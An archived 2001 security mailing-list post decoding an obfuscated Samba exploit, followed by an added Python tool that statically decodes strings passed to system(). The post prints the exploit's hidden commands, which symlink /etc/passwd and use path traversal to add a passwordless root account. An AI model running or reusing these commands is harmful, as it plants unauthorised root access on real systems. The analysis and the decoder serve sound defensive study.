Samba Exploit Code

From: Dave Ahmad (daat_private)
Date: Thu Oct 25 2001 - 20:33:23 PDT

    Hey,
    
    There is some confusion about the Samba exploit.  It is an obfuscated
    exploit for an old vulnerability in the Samba daemon.  Before approving it
    to the list, I checked it.
    
    The system() calls:
    
    system(inject1, 0);
    system(inject2, 0);
    system(inject3a, 0);
    
    Try this:
    
    printf("%s\n%s\n%s\n",inject1,inject2,inject3a);
    
    output:
    
    /bin/rm -rf /tmp/x.log
    /bin/ln -s /etc/passwd /tmp/x.log
    /usr/bin/smbclient //localhost/"
    
    fd::0:0::/:/bin/sh\n" -n ../../../tmp/x -N
    
    I am not sure why they chose to write the exploit this way.
    
    Regards,
    
    Dave Ahmad
    SecurityFocus
    www.securityfocus.com
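
An added example, not part of the original post or of the exploit it discusses: the same check done statically, so the untrusted source never has to be compiled or run. The sample source is constructed and benign, and the function names are this example's own.

```python
import re

# Constructed sample, not the exploit from the post: string arguments are
# hidden behind hex/octal escapes and passed to system() by variable name.
SAMPLE = r'''
char inject1[] = "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x6f\x6e\x65";
char *inject2 = "/bin/ec" "ho\040two";
int main(void) {
    system(inject1, 0);
    system(inject2, 0);
    system(inject3a, 0);
}
'''

_SIMPLE = {"n": "\n", "t": "\t", "r": "\r", "\\": "\\", '"': '"', "'": "'"}
_ESC = re.compile(r'\\(x[0-9a-fA-F]+|[0-7]{1,3}|.)', re.S)
_LIT = re.compile(r'"((?:[^"\\]|\\.)*)"')
_DECL = re.compile(
    r'\bchar\b\s*\*?\s*(\w+)\s*(?:\[\s*\d*\s*\])?\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+);')
_CALL = re.compile(r'\bsystem\s*\(\s*(\w+)')

def decode_c_string(body):
    """Decode the escape sequences inside one C string literal (quotes removed)."""
    def repl(m):
        e = m.group(1)
        if e[0] == "x" and len(e) > 1:      # \xHH hex escape
            return chr(int(e[1:], 16) & 0xFF)
        if e[0] in "01234567":              # \ooo octal escape
            return chr(int(e, 8) & 0xFF)
        return _SIMPLE.get(e, e)            # \n, \t, \" ... or unknown, kept as-is
    return _ESC.sub(repl, body)

def system_arguments(source):
    """Return [(name, decoded string or None)] for every system(<identifier>...) call."""
    strings = {}
    for name, literals in _DECL.findall(source):
        # Adjacent literals ("a" "b") are concatenated, as the C compiler would.
        strings[name] = "".join(decode_c_string(b) for b in _LIT.findall(literals))
    return [(name, strings.get(name)) for name in _CALL.findall(source)]

if __name__ == "__main__":
    for name, value in system_arguments(SAMPLE):
        shown = repr(value) if value is not None else "unresolved, review by hand"
        print(f"system({name}) -> {shown}")
```

Only arguments initialised from string literals are resolved; anything built at run time is reported as unresolved and still needs manual review.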
    



    This archive was generated by hypermail 2b30 : Thu Oct 25 2001 - 20:40:18 PDT